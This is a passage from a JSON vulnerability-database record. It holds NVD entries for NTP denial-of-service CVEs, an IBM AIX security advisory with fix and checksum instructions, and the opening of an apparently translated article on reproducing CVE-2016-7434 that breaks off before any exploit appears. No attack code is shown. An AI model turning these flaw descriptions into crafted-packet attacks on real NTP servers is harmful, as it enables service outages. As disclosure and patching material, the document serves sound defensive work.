"NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7426", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7426"], "modified": "2020-06-18T18:14:00", "cpe": ["cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.3", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:redhat:enterprise_linux_server_eus:7.3", "cpe:/o:redhat:enterprise_linux_server_eus:7.7", "cpe:/a:ntp:ntp:4.2.8", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/o:redhat:enterprise_linux_server_tus:7.7", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.3", "cpe:/o:redhat:enterprise_linux_server_aus:7.7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/a:ntp:ntp:4.2.5", "cpe:/o:redhat:enterprise_linux_server_eus:7.6"], "id": "CVE-2016-7426", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7426", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": 
[
"cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p229:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p217:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p225:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p207:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p235_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p248_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p231_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:p205:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:44", "description": "ntpd in NTP before 4.2.8p9, when the trap service is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a crafted packet.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-9311", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9311"], "modified": "2019-01-24T11:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-9311", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9311", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, 
"cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:44", "description": "The control mode (mode 6) functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to set or unset traps via a crafted control mode packet.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 2.5}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-9310", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9310"], "modified": "2019-01-24T11:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-9310", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9310", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:05", "description": "The ULOGTOD function in ntp.d in SNTP before 4.2.7p366 does not properly perform type conversions from a precision value to a double, which allows remote attackers to cause a denial of service (infinite loop) via a crafted NTP packet.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", 
"confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-21T14:29:00", "title": "CVE-2015-5219", "type": "cve", "cwe": ["CWE-704"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5219"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:15.04", "cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:fedoraproject:fedora:21", "cpe:/o:suse:manager:2.1", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:suse:linux_enterprise_server:10", "cpe:/o:suse:manager_proxy:2.1", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:suse:openstack_cloud:5", "cpe:/a:suse:linux_enterprise_debuginfo:11", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:novell:leap:42.2", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:ntp:ntp:4.2.7", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_hpc_node:6.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:suse:linux_enterprise_server:11", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:fedoraproject:fedora:22", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/o:fedoraproject:fedora:23", 
"cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2015-5219", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5219", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:21:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe:2.3:a:suse:linux_enterprise_debuginfo:11:sp2:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:openstack_cloud:5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:leap:42.2:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp3:*:*:ltss:*:*:*", "cpe:2.3:o:suse:manager_proxy:2.1:*:*:*:*:*:*:*", "cpe:2.3:o:suse:manager:2.1:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:23:*:*:*:*:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:10:sp4:*:*:ltss:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p355:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:o:suse:linux_enterprise_server:11:sp2:*:*:ltss:*:*:*"]}], "aix": [{"lastseen": "2020-04-22T00:52:14", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-9310"], "description": "IBM SECURITY 
ADVISORY\n\nFirst Issued: Mon Feb 13 15:32:47 CST 2017\n|Updated: Mon Oct 2 10:47:12 CDT 2017 \n|Update 2: Removed bos.net.tcp.ntp from the impacted fileset list for\n| AIX 7200-01-02. Fileset bos.net.tcp.ntpd is still listed as impacted\n| for AIX 7200-01-02.\n\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc\nhttps://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc\nftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc\n\n\nSecurity Bulletin: Vulnerabilities in NTP affect AIX\n CVE-2016-7427 CVE-2016-7428 CVE-2016-9310 CVE-2016-9311 \n\n===============================================================================\n\nSUMMARY:\n\n There are multiple vulnerabilities in NTPv3 and NTPv4 that impact AIX. \n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n NTPv3 and NTPv4 are vulnerable to:\n\n CVEID: CVE-2016-7427\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7427 \n DESCRIPTION: NTP is vulnerable to a denial of service, caused by an error\n in broadcast mode replay prevention functionality. By sending specially \n crafted NTP packets, a local attacker could exploit this vulnerability to \n cause a denial of service.\n CVSS Base Score: 4\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119088 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n \n CVEID: CVE-2016-7428 \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7428\n DESCRIPTION: NTP is vulnerable to a denial of service, caused by an error \n in broadcast mode poll interval enforcement functionality. 
By sending \n specially crafted NTP packets, a remote attacker from within the local \n network could exploit this vulnerability to cause a denial of service.\n CVSS Base Score: 4.3 \n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119089 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n CVEID: CVE-2016-9310\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9310\n DESCRIPTION: NTP is vulnerable to a denial of service, caused by an error \n in the control mode (mode 6) functionality. By sending specially crafted \n control mode packets, a remote attacker could exploit this vulnerability \n to obtain sensitive information and cause the application to crash.\n CVSS Base Score: 6.5\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119087 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L)\n\n CVEID: CVE-2016-9311\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9311\n DESCRIPTION: NTP is vulnerable to a denial of service, caused by a NULL \n pointer dereference when trap service has been enabled. By sending specially \n crafted packets, a remote attacker could exploit this vulnerability to cause\n the application to crash. 
\n CVSS Base Score: 4.4\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/119086 for more\n information.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H)\n\n \n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2\n\n The following fileset levels are vulnerable:\n \n key_fileset = aix\n \n For NTPv3:\n\n Fileset Lower Level Upper Level KEY PRODUCT(S)\n ------------------------------------------------------------------\n bos.net.tcp.client 5.3.12.0 5.3.12.10 key_w_fs NTPv3\n bos.net.tcp.client 6.1.9.0 6.1.9.200 key_w_fs NTPv3\n bos.net.tcp.client 7.1.3.0 7.1.3.48 key_w_fs NTPv3\n bos.net.tcp.client 7.1.4.0 7.1.4.30 key_w_fs NTPv3\n bos.net.tcp.ntp 7.2.0.0 7.2.0.2 key_w_fs NTPv3\n bos.net.tcp.ntpd 7.2.0.0 7.2.0.2 key_w_fs NTPv3\n bos.net.tcp.ntpd 7.2.1.0 7.2.1.0 key_w_fs NTPv3\n\n \n For NTPv4:\n\n Fileset Lower Level Upper Level KEY PRODUCT(S) \n -----------------------------------------------------------------\n ntp.rte 6.1.6.0 6.1.6.7 key_w_fs NTPv4\n ntp.rte 7.1.0.0 7.1.0.7 key_w_fs NTPv4 \n \n Note: To find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's\n guide.\n\n Example: lslpp -L | grep -i ntp.rte \n\n\n REMEDIATION:\n\n A. 
APARS\n \n IBM has assigned the following APARs to this problem:\n\n For NTPv3:\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 5.3.12 IV92194 NA key_w_apar NTPv3\n 6.1.9 IV91803 ** SP9 key_w_apar NTPv3\n 7.1.3 IV92193 ** SP9 key_w_apar NTPv3\n 7.1.4 IV91951 ** SP4 key_w_apar NTPv3\n 7.2.0 IV92192 ** SP4 key_w_apar NTPv3\n 7.2.1 IV92067 ** SP2 key_w_apar NTPv3\n\n For NTPv4:\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 6.1.9 IV92287 ** SP9 key_w_apar NTPv4\n 7.1.3 IV92126 ** SP9 key_w_apar NTPv4\n 7.1.4 IV92126 ** SP4 key_w_apar NTPv4\n 7.2.0 IV92126 ** SP4 key_w_apar NTPv4\n 7.2.1 IV92126 ** SP2 key_w_apar NTPv4\n\n ** Please refer to AIX support lifecycle information page for availability\n of Service Packs:\n http://www-01.ibm.com/support/docview.wss?uid=isg3T1012517\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV91803\n http://www.ibm.com/support/docview.wss?uid=isg1IV91951\n http://www.ibm.com/support/docview.wss?uid=isg1IV92192\n http://www.ibm.com/support/docview.wss?uid=isg1IV92287\n http://www.ibm.com/support/docview.wss?uid=isg1IV92126\n http://www.ibm.com/support/docview.wss?uid=isg1IV92194\n http://www.ibm.com/support/docview.wss?uid=isg1IV92193\n http://www.ibm.com/support/docview.wss?uid=isg1IV92067\n \n https://www.ibm.com/support/docview.wss?uid=isg1IV91803\n https://www.ibm.com/support/docview.wss?uid=isg1IV91951\n https://www.ibm.com/support/docview.wss?uid=isg1IV92192\n https://www.ibm.com/support/docview.wss?uid=isg1IV92287\n https://www.ibm.com/support/docview.wss?uid=isg1IV92126\n https://www.ibm.com/support/docview.wss?uid=isg1IV92194\n https://www.ibm.com/support/docview.wss?uid=isg1IV92193\n https://www.ibm.com/support/docview.wss?uid=isg1IV92067\n \n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the 
fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available.\n\n The fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_fix8.tar\n http://aix.software.ibm.com/aix/efixes/security/ntp_fix8.tar\n https://aix.software.ibm.com/aix/efixes/security/ntp_fix8.tar \n\n The links above are to a tar file containing this signed\n advisory, interim fixes, and OpenSSL signatures for each interim fix.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n For NTPv3:\n\n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 5.3.12.9 IV92194m9a.170113.epkg.Z key_w_fix NTPv3\n 6.1.9.6 IV91803m6a.170112.epkg.Z key_w_fix NTPv3\n 6.1.9.7 IV91803m6a.170112.epkg.Z key_w_fix NTPv3\n 6.1.9.8 IV91803m6a.170112.epkg.Z key_w_fix NTPv3\n 7.1.3.5 IV92193m5a.170112.epkg.Z key_w_fix NTPv3\n 7.1.3.6 IV92193m5a.170112.epkg.Z key_w_fix NTPv3\n 7.1.3.7 IV92193m5a.170112.epkg.Z key_w_fix NTPv3\n 7.1.3.8 IV92193m5a.170112.epkg.Z key_w_fix NTPv3\n 7.1.4.1 IV91951m3a.170113.epkg.Z key_w_fix NTPv3\n 7.1.4.2 IV91951m3a.170113.epkg.Z key_w_fix NTPv3\n 7.1.4.3 IV91951m3a.170113.epkg.Z key_w_fix NTPv3\n 7.2.0.0 IV92192m2a.170112.epkg.Z key_w_fix NTPv3\n 7.2.0.1 IV92192m2a.170112.epkg.Z key_w_fix NTPv3\n 7.2.0.2 IV92192m2a.170112.epkg.Z key_w_fix NTPv3\n 7.2.1.0 IV92067s1a.170112.epkg.Z key_w_fix NTPv3\n 7.2.1.1 IV92067s1a.170112.epkg.Z key_w_fix NTPv3\n\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.4.2x IV91803m6a.170112.epkg.Z key_w_fix NTPv3\n\n \n For NTPv4:\n\n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 6.1.x IV92287m5a.170113.epkg.Z key_w_fix NTPv4\n 7.1.x IV92126m3a.170106.epkg.Z key_w_fix NTPv4\n 7.2.x IV92126m3a.170106.epkg.Z key_w_fix NTPv4\n \n \n All fixes included are 
cumulative and address previously\n issued AIX NTP security bulletins with respect to SP and TL. \n\n To extract the fixes from the tar file:\n\n tar xvf ntp_fix8.tar\n cd ntp_fix8\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 <filename>\" command as the following:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 70044311eab50e798b1a0756b8f7fef368b65ae79c03496c1fbcf5ba8da7b176 IV91803m6a.170112.epkg.Z key_w_csum\n 8ef346dbd1d7f3d8e9c03b21fa6e2cd1dca88de9d0951675a4787f34bf892f30 IV91951m3a.170113.epkg.Z key_w_csum\n f6105a97e957651e8a464cfd6edd0ad50a74ba9dffb974925612f68d21fa7857 IV92192m2a.170112.epkg.Z key_w_csum\n f1ab705600cc8b08dd11a6e12d1b32a2ec89b988557502ffffd6c06dd53936b9 IV92287m5a.170113.epkg.Z key_w_csum\n 57c9db9c53098f21e837a407e2b2dead1c1c754d44812eb0392d050e697ae2bd IV92126m3a.170106.epkg.Z key_w_csum\n f8d9c43a2ae724a7a1e69caab5973aed0bb4b6ddc72bc57d038fad6faa680fa1 IV92194m9a.170113.epkg.Z key_w_csum\n 558db7a325e5d6733bac66f9b01a9dee4a93826163a50992ee99c1cb9f7dfe70 IV92193m5a.170112.epkg.Z key_w_csum\n eee9aec25443fa496168f7c4cfb289dbfaeed96c8be0fc3cb57b888733e4f9d4 IV92067s1a.170112.epkg.Z key_w_csum\n\n \n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. 
If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n The fix will not take effect until any running xntpd servers\n have been stopped and restarted with the following commands:\n\n stopsrc -s xntpd\n startsrc -s xntpd\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n After installation the ntp daemon must be restarted:\n\n stopsrc -s xntpd\n startsrc -s xntpd\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n WORKAROUNDS AND MITIGATIONS:\n\n 
None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n https://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n https://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n https://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\nhttps://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n\n B. Download the key from a PGP Public Key Server. 
The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n https://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n https://www.first.org/cvss/calculator/3.0\n\n\n\nACKNOWLEDGEMENTS:\n\n None \n\n\nCHANGE HISTORY:\n\n First Issued: Mon Feb 13 15:32:47 CST 2017\n Updated:Fri Feb 17 18:40:29 CST 2017\n Update: New iFixes provided for NTPv3 in AIX 5.3.12.9,6.1.9.6,\n 6.1.9.8,7.1.3.5,7.1.3.6,7.1.3.7,7.1.3.8,7.1.4.3,7.2.0.0,7.2.0.2\n 7.2.1.0,7.2.1.1 and VIOS 2.2.4.x.\n| Updated: Mon Oct 2 10:47:12 CDT 2017\n| Update 2: Removed bos.net.tcp.ntp from the impacted fileset list for\n| AIX 7200-01-02. Fileset bos.net.tcp.ntpd is still listed as impacted\n| for AIX 7200-01-02.\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n \n\n\n\n\n\n\n", "edition": 25, "modified": "2017-10-02T10:47:12", "published": "2017-02-13T15:32:47", "id": "NTP_ADVISORY8.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/ntp_advisory8.asc", "title": "There are multiple vulnerabilities in NTPv3 and NTPv4 that impact AIX.", "type": "aix", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "myhack58": [{"lastseen": "2016-12-03T17:44:13", "bulletinFamily": "info", "cvelist": ["CVE-2016-7434", "CVE-2016-9311"], "edition": 1, "description": "Foreword\n\nNTP has been making news recently, and many security media outlets have reported on it; many of the NTP vulnerabilities are very interesting. NTP is the Network Time Protocol, used to synchronize time between computers, and some [DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>) attacks use NTP amplification. In the same period, several NTP denial-of-service vulnerabilities were disclosed in succession; such a vulnerability can cause a denial of service of the NTP service, or even of the NTP server. Freebuf previously published an article reporting a Windows NTP denial-of-service vulnerability.\n\nhttp://www.freebuf.com/vuls/121129.html\n\nThat article discusses CVE-2016-9311, an NTP denial-of-service vulnerability under Windows. Later I also saw a bulletin on CNVD about NTP denial-of-service vulnerabilities.\n\nhttp://www.cnvd.org.cn/webinfo/show/3992\n\nI selected one of them, the Linux NTP denial-of-service vulnerability CVE-2016-7434, for a full analysis. While reproducing it I found that the exploit takes effect without requiring any settings. Of course, the latest version released on ntp.org11, 4.2.8p9, fixes this vulnerability, and 4.2.
8p8 is affected by this vulnerability.\n\nNTP Protocol Analysis with CVE-2016-7434\n\nI will not describe in detail how the client and the NTP server interact over the NTP protocol to synchronize time; a figure gives a brief description of the time synchronization process. In this process the data is transmitted over the NTP protocol, and the server port used for the interaction is port 123.\n\n![](/Article/UploadPic/2016-12/2016123154243294.png)\n\nWe download NTP-4.2.8p8, decompress it with tar, and install it with configure, make and make install. After installation, use ./ntpd -n -c [ntp.conf path] to run ntpd. Many Linux systems come with NTP, so you need to switch to the ntpd directory and run the ntpd in that directory to ensure that the version is the problematic version.\n\n![](/Article/UploadPic/2016-12/2016123154243887.png)\n\nLet us take a look at the NTP protocol format.\n\n![](/Article/UploadPic/2016-12/2016123154243576.png)\n\nThe meaning of each NTP protocol field is explained online, so I will not repeat it here. One of the fields is Mode, which represents the working mode. It is worth mentioning that earlier NTP usually responded to NTP requests with the Mode 7 monlist feature, but monlist has a vulnerability that can be exploited for NTP amplification attacks, that is, 